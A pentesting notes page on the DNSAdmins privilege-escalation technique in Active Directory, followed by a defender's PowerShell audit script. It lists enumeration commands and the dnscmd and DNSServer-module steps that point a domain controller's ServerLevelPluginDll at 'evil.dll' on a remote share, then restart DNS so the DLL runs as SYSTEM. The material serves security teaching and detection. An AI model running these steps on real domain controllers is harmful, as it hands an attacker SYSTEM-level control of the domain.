Pentesting Articles and Notes

DNS Administrators

Members of the DNSAdmins group can make dns.exe load an arbitrary DLL as a server-level plugin. Since dns.exe runs as SYSTEM, any code in that DLL runs as SYSTEM.

You will need the privileges necessary to restart the DNS service to conduct this attack.

Attacking DNS Admins

Enumerate DNS Admins

# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"

# AD Module
Get-ADGroupMember -Identity "DNSAdmins"
  • From Linux

# pywerview.py
./pywerview.py get-netgroupmember -u <user> -p <pass> --dc-ip <ip> --groupname "DNSAdmins"

Exploitation

With the privileges of a DNS Admin, configure the plugin DLL using dnscmd.exe (requires the RSAT DNS tools) or the DNSServer PowerShell module.

  • Host a DLL on a share and set it as the server-level plugin DLL

# using dnscmd.exe
dnscmd dcorp-dc /config /serverlevelplugindll \\<share_ip>\dll\evil.dll

# using DNSServer Module
$dnsettings = Get-DnsServerSetting -ComputerName <dc> -Verbose -All

$dnsettings.ServerLevelPluginDll = "\\<share_ip>\dll\evil.dll"

Set-DnsServerSetting -InputObject $dnsettings -ComputerName <dc> -Verbose
  • Then restart the DNS service; dns.exe loads the configured DLL on start, so the DLL's code runs as SYSTEM.

sc \\<dc> stop dns
sc \\<dc> start dns
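From the defender's side, the two things worth auditing are who sits in DNSAdmins (recursively) and whether any DC has a ServerLevelPluginDll value set at all, since a clean server has none and a UNC path is exactly the pattern above. The following audit script is an added example, not part of the original notes; it assumes the RSAT ActiveDirectory and DnsServer modules are installed, and the function name is mine.

```powershell
# Added example: audit DNSAdmins membership and the ServerLevelPluginDll setting.
Import-Module ActiveDirectory
Import-Module DnsServer

function Get-DnsAdminsExposure {
    param(
        # Default to every DC in the current domain; pass names to narrow it down.
        [string[]]$DnsServers = @((Get-ADDomainController -Filter *).HostName)
    )

    # Who can change the plugin DLL? -Recursive expands nested groups.
    $members = Get-ADGroupMember -Identity "DNSAdmins" -Recursive |
        Select-Object -ExpandProperty SamAccountName

    foreach ($srv in $DnsServers) {
        try {
            # Same cmdlet the attack uses, read-only here; -All exposes ServerLevelPluginDll.
            $dll = (Get-DnsServerSetting -ComputerName $srv -All -ErrorAction Stop).ServerLevelPluginDll
        } catch {
            # Fall back to the registry value that backs the setting.
            $dll = Invoke-Command -ComputerName $srv -ErrorAction SilentlyContinue -ScriptBlock {
                (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                    -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
            }
        }

        [pscustomobject]@{
            Server     = $srv
            PluginDll  = $dll
            # Any non-empty value deserves a ticket; a UNC path is the textbook abuse.
            Configured = -not [string]::IsNullOrEmpty($dll)
            UncPath    = [bool]($dll -like '\\*')
            DnsAdmins  = ($members -join ', ')
        }
    }
}

Get-DnsAdminsExposure | Format-Table -AutoSize
```

Run it periodically from a privileged admin workstation; any row with Configured set to True that you did not provision yourself is an incident, and the DnsAdmins column tells you which accounts could have set it.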